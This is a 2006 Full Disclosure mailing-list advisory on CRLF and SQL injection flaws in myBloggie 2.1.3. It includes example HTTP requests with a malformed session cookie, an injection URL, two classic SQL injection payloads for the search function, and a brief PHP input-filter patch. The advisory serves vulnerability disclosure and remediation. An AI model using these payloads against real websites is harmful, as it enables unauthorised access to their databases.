Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

HYSA-2006-008 myBloggie 2.1.3 CRLF & SQL Injection

From: h4cky0u <h4cky0u.org () gmail com>
Date: Wed, 17 May 2006 18:21:46 +0530
------------------------------------------------------
     HYSA-2006-008 h4cky0u.org Advisory 017
------------------------------------------------------
Date - Wed May 17 2006


TITLE:
======

myBloggie 2.1.3 CRLF & SQL Injection


SEVERITY:
=========

Medium


SOFTWARE:
=========

myBloggie 2.1.3

http://mybloggie.mywebland.com/


INFO:
=====

myBloggie is considered one of the most simple, user-friendliest yet packed
with features

Weblog system available to date.


DESCRIPTION:
============

--==CRLF injection==--

GET /mybloggie/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close

GET /mybloggie/admin.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close

GET /mybloggie/index.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=op0-11{}};q, or something like that
Connection: Close

--==SQL injection==--

http://127.0.0.1/mybloggie/index.php?mode=viewid&post_id=&apos;

Also MurderSkillz discovered a bug in the search function. Here is a
proof-of-concept:

1' having '1'='1'--

or

' or 'x'='x--

And a little patch from me:

if(ereg('[^A-Za-z0-9_]',$_POST['keyword'])){
   echo "Invalid Characters";
   exit;
   }

if (isset($_GET['select'])) $select=$_GET['select'];
if (isset($_POST['keyword'])) $keyword=$_POST['keyword'];


$keyword = preg_replace($html_entities_match,
$html_entities_replace,$keyword);
//....


VENDOR STATUS:
==============

Vendor was contacted but no response received till date.


CREDITS:
========

This vulnerability was discovered and researched by
matrix_killer of  h4cky0u Security Forums.

mail : matrix_k at abv.bg

web : http://www.h4cky0u.org


Search function sql injection was discovered by:  MurderSkillz


Co-Researcher:

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org

Greets to all omega-team members + krassswr,EcLiPsE and all who support us
!!!


ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt

--
http://www.h4cky0u.org
(In)Security at its best...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: